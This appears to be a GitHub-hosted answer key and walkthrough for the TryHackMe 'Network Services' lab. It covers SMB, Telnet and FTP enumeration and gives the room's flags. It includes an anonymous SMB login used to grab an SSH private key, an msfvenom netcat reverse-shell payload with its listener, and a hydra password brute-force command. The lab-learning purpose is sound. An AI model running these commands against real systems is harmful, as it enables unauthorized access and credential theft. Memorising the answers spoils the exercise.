-
Notifications
You must be signed in to change notification settings - Fork 0
/
Network Services
207 lines (127 loc) · 4.88 KB
/
Network Services
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
#Task 2 Understanding SMB
- What does SMB stand for?
Server Message Block
- What type of protocol is SMB?
response-request
- What do clients connect to servers using?
TCP/IP
- What systems does Samba run on?
Unix
#Task 3 Enumerating SMB
- Conduct an nmap scan of your choosing, How many ports are open?
hint: nmap -A -p- $IP
3
- What ports is SMB running on?
139/445
- Let's get started with Enum4Linux, conduct a full basic enumeration. For starters, what is the workgroup name?
WORKGROUP
- What comes up as the name of the machine?
POLOSMB
- What operating system version is running?
6.1
- What share sticks out as something we might want to investigate?
profiles
#Task 4 Exploiting SMB
- What would be the correct syntax to access an SMB share called "secret" as user "suit" on a machine with the IP 10.10.10.2 on the default port?
smbclient //10.10.10.2/secret -U suit -p 445
- Does the share allow anonymous access? Y/N?
Y
- Great! Have a look around for any interesting documents that could contain valuable information. Who can we assume this profile folder belongs to?
John Cactus
- What service has been configured to allow him to work from home?
ssh
- Okay! Now we know this, what directory on the share should we look in?
.ssh
- This directory contains authentication keys that allow a user to authenticate themselves on, and then access, a server. Which of these keys is most useful to us?
id_rsa
- What is the smb.txt flag?
THM{smb_is_fun_eh?}
#Task 5 Understanding Telnet
- What is Telnet?
application protocol
- What has slowly replaced Telnet?
ssh
- How would you connect to a Telnet server with the IP 10.10.10.3 on port 23?
telnet 10.10.10.3 23
- The lack of what, means that all Telnet communication is in plaintext?
encryption
#Task 6 Enumerating Telnet
- How many ports are open on the target machine?
hint: nmap -A -p- $IP
1
- What port is this?
8012
- This port is unassigned, but still lists the protocol it's using, what protocol is this?
TCP
- Now re-run the nmap scan, without the -p- tag, how many ports show up as open?
0
- Based on the title returned to us, what do we think this port could be used for?
a backdoor
- Who could it belong to? Gathering possible usernames is an important step in enumeration.
Skidy
#Task 7 Exploiting Telnet
-Great! It's an open telnet connection! What welcome message do we receive?
hint: telnet $IP 8012
SKIDY'S BACKDOOR.
- Let's try executing some commands, do we get a return on any input we enter into the telnet session? (Y/N)
N
- Now, use the command "ping [local THM ip] -c 1" through the telnet session to see if we're able to execute system commands. Do we receive any pings? Note, you need to preface this with .RUN (Y/N)
hint: tcpdump ip proto \\icmp -i tun0
with tun0 is nam card openvpn
Y
We're going to generate a reverse shell payload using msfvenom.This will generate and encode a netcat reverse shell for us. Here's our syntax:
"msfvenom -p cmd/unix/reverse_netcat lhost=[local tun0 ip] lport=4444 R"
-p = payload
lhost = our local host IP address (this is your machine's IP address)
lport = the port to listen on (this is the port on your machine)
R = export the payload in raw format
- What word does the generated payload start with?
mkfifo
Perfect. We're nearly there. Now all we need to do is start a netcat listener on our local machine. We do this using:
"nc -lvp [listening port]"
-What would the command look like for the listening port we selected in our payload?
nc -lvp 4444
- Success! What is the contents of flag.txt?
THM{y0u_g0t_th3_t3ln3t_fl4g}
#Task 8 Understanding FTP
What communications model does FTP use?
- client-server
What's the standard FTP port?
21
- How many modes of FTP connection are there?
2
#Task 9 Enumerating FTP
-Run an nmap scan of your choice.
How many ports are open on the target machine?
hint: nmap -sVSC -Pn -vv $IP
open only port 21
but right answer 2
2
- What port is ftp running on?
21
- What variant of FTP is running on it?
vsftpd
Great, now we know what type of FTP server we're dealing with we can check to see if we are able to login anonymously to the FTP server. We can do this using by typing "ftp [IP]" into the console, and entering "anonymous", and no password when prompted.
-What is the name of the file in the anonymous FTP directory?
hint: ftp $IP
anonymous
ls
get PUBLIC_NOTICE.txt
PUBLIC_NOTICE.txt
- What do we think a possible username could be?
hint: cat PUBLIC_NOTICE.txt
mike
#Task 10 Exploiting FTP
- What is the password for the user "mike"?
hint: hydra -t 4 -l mike -P /usr/share/wordlists/rockyou.txt -vV $IP ftp
password
- What is ftp.txt?
hint: ftp $IP
mike
ls
get ftp.txt
THM{y0u_g0t_th3_ftp_fl4g}
https://tryhackme.com/room/networkservices
https://juliette1012.github.io/posts/THM-Network-Services/
https://fthcyber.com/2020/09/30/network-services-writeup-tryhackme/
https://wuvel.net/network-services/